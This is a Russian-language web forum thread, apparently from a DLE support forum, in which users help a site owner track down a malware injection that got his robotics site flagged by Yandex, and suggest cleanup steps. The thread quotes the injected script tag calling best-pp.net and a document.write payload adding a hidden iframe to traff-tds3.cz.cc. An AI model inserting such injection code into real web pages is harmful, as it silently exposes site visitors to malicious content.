Яндекс ограничил выдачу из-за вирусов

[leksa 0]

Итак сайт http://roboting.ru

Вду 9.2 лицензия

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 19.08.2011 Поведенческий анализ

http://roboting.ru/space-robots/ 19.08.2011 Поведенческий анализ

http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 20.08.2011 Поведенческий анализ

http://roboting.ru/16-teorija-promyshlennykh-robotov.html 24.08.2011 Поведенческий анализ

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Exploit

http://roboting.ru/809-nepobedimye-transformery-teper-i-na.html 24.08.2011 Exploit

http://roboting.ru/space-robots/ 24.08.2011 Поведенческий анализ

http://roboting.ru/ 24.08.2011 Поведенческий анализ

http://roboting.ru/space-robots/ 24.08.2011 Exploit

http://roboting.ru/1021-neato-xv-11-poboretsja-s-roomba-na.html 24.08.2011 Поведенческий анализ

Не могу найти код трояна на сайте. У людей ругается на во это <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://best-pp.net/in.php?id=9544&quo...script>

Комп почистил, пароли поменял

Помогите обезвредить этот вирус.

Спасибо!

[Compton 34]

А вот и содержание эксплойта:

document.write('<div style="position: absolute;left: 0;bottom: 100%;"><iframe src="http://traff-tds3.cz.cc/forum.php" width=10 height=49></iframe></div>');

Может модули левые ставил?

[leksa 0]

Подскажите как вы его нашли и где?

модули стоят сторонние такие:

1. последниме коменты в левом сайдбаре и

еще коменты которые сейчас отключены, которые выводят новости с картинками

[Compton 34]

Нашел я его по ссылке из того-самого скрипта, который висит в шапке вашего сайта. По идее данный скрипт должен был выводить на вашем сайте какую-нибудь какашку вроде окошка, баннера и т.п. Но вывести не смог наверно потому, что в DLE заблокирован тег <iframe>. Ссылки на установленные модули приведите, пожалуйста. Или листинги.

[- Den - 32]

[leksa 0]

Итак.

я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться?

Модули стоят такие:

1. topnews_mod.php

2. engine/modules/iComm/run.php

Ден, такую. же шляпу и я видел. Но это после того как появился вирус. Видимо он выводит, и получается такой бред

Раньше такого не было

[Compton 34]

У меня в Opera все нормально выводится.

Итак.

я смотрю у меня группа фэйсбук выводится через тег iframe. но из-за этого не должно ругаться?

Модули стоят такие:

1. topnews_mod.php

2. engine/modules/iComm/run.php

Мне ваши ссылки ничего не дают. Модули платные? Если бесплатные, то приведите листинги прямо здесь. А еще попробуйте поискать эксплойт в файле index.php, обычно зараза далеко не уходит.

[leksa 0]

модули бесплатные

Не совсем понял, что такое листинги

один модуль имеет название

Последние Коментарии 3.3

Настройки модуля, функции Show Hint и параметры вывода блока.

второй не знаю как точно называется

В index.php все уже перерыл. вроде нету

[Compton 34]

Например вот это:

$commentslast = dle_cache( "comments-last", $config['skin'] );    if( ! $commentslast ) {    include( ROOT_DIR . "/engine/data/comments-last.php" );    if( $commentslast['on'] == "1" ) {    define( "LIMITCOMM", $commentslast['lines'] );  define( "LIMITTITL", $commentslast['titlelimit'] );  define( "SHOWHITHB", $commentslast['showhint'] );

Это и есть тот самый листинг.

- Den -, в FF такую же фигню показывает. ТС еще раз вам говорю, загляните в файл index.php! Заметите что нибудь подозрительное - пишите! Онлайн сканеры вам ничего не дадут! Они получают только HTML-код, а искать нужно в исходниках.

Имя какашки: [Trojan-Clicker.HTML.IFrame (v)]

FTP пользуетесь?

edit:

Попробуйте вызвать Диспетчер задач (Cntrl + Alt + Delete) и перейдите на вкладку "Процессы". Теперь ищите следующие процессы:

DMEYN.EXE

DMN.EXE

DMV.EXE

DMR.EXE

DML.EXE

DMT.EXE

DMP.EXE

RVL.EXE

1.EXE

ZJ7.EXE

ZJ9.EXE

_DMN IT PAGALBA.EXE

18046662.EXE

Если что-то подобное нашли, знайте - зараза попала на сайта с вашего компьютера.

Изменено 24 августа 2011 пользователем Compton

[leksa 0]

1.Да, пользуюсь ФТП через Filezilla

2.залил index.php который идет с DLE

Гляньте, что-нибудь поменялось или нет?

3. Модуль вот такой. Открыл главную страницу этого модуля и скопировал код:

<?php

Author: RooTM

------------------------------------------------------

Web-site: http://weboss.net/

=====================================================*/

if( ! defined( 'DATALIFEENGINE' ) ) {

die( "Hacking attempt!" );

}

$max_text = 70;

$max_title = 30;

$max_comm = 5;

$groups_color = "group_1:#FF0000,group_2:#CC33CC,group_3:#009900,group_4:#3333FF";

$is_change = false;

if ($config['allow_cache'] != "yes") { $config['allow_cache'] = "yes"; $is_change = true;}

$iComm = dle_cache( "iComm", $config['skin'] );

if( $iComm === false ) {

require_once ENGINE_DIR . '/classes/templates.class.php';

$tpl = new dle_template ( );

$tpl->dir = ENGINE_DIR . '/modules/iComm/';

define ( 'TEMPLATE_DIR', $tpl->dir );

$db->query( "SELECT comments.post_id,comments.user_id, comments.is_register, comments.text, comments.autor, comments.email,comments.approve, post.id, post.date as newsdate, post.title, post.category, post.comm_num, post.alt_name, post.flag,users.user_group,users.user_id FROM " . PREFIX . "_comments as comments, " . PREFIX . "_post as post, " . PREFIX . "_users as users WHERE post.id=comments.post_id AND comments.user_id = users.user_id AND comments.approve = 1 ORDER BY comments.date DESC LIMIT 0, " . $max_comm );

while ( $row = $db->get_row() ) {

нет, нету таких процессов, Правда я проверял комп вчера на вирусы

[Compton 34]

В приведенном вами листинге вредоносного кода нет. После перезаливки ничего не поменялось. Попробуйте перезалить шаблон вашего сайта (все файлы).

[prikindel 255]

да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет.

поищи на форуме куча ссылок как лечиться от заразы

было бы неплохо, если администрация вынесла эту тему куда то отдельной ссылкой, ибо куча тема плодится новых

Изменено 24 августа 2011 пользователем prikindel

[leksa 0]

перезалил шаблон

Ну что?

prikindel, ну атк подскажи куда копать если не сложно

Чо в Бд искать? инородные таблицы?

[Compton 34]

ТС, короче, есть самый радикальный, быстрый и эффективный метод. Называется переустановка движка.

Заходите сюда : engine/data

Папка живет тут:

http://roboting.ru/engine/data

Копируете оттуда все файлы себе на компьютер.

Заходите сюда : engine/cache

Папка живет тут:

http://roboting.ru/engine/cache

Копируете оттуда все файлы себе на компьютер. Чтобы в дальнейшем работали категории, группы пользователей и т.д.

Если надо, копируете папку backup из корня сайта. В ней могут хранится дампы БД (если вы конечно их делали).

Папка живет тут:

http://roboting.ru/backup/

Сносите подчистую движок.

Теперь заранее скопированную папку data кидаете в папку с движком на вашем компьютере (в папку engine). Подтверждаете замену файлов.

Папку cache туда же.

Копируете папку backup в корневую папку.

Заливаете папку с движком себе на сайт. Внимание! Жмякать в install.php не надо! Установка нам не нужна.

Смотрите. зараза исчезла - ура! Не исчезла - значит, как сказал prikindel, гадость где-то в БД.

Изменено 24 августа 2011 пользователем Compton

[celsoft 6 076]

перезалил шаблон

Ну что?

Перезаливать нужно не только шаблон, но и все оригинальные файлы скрипта, вернув все оригинальные.

да там вообще любой вредоносный код в базе может храниться, в самих новостях. можете до передоза проверять файлы движка, не поможет.

Ничего в БД у автора не хранится, это видно по коду страницы, сам вирус выводится самой первой строкой, что говорит, что он скорее всего где то в одном из файлов скрипта. А по причине обычного воровства FTP доступа, т.к. эти файлы только по FTP, можно поменять.

Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP.

Если после перезаливки файлов скрипта на оригинальные проблема не решится, то посмотрите вручную файлы в папке engine/data/ есть ли там код, т.к. в дистрибутиве нет файлов в этой папке и перезаливка дистрибутива не очистит эти файлы от гадости, если она в них.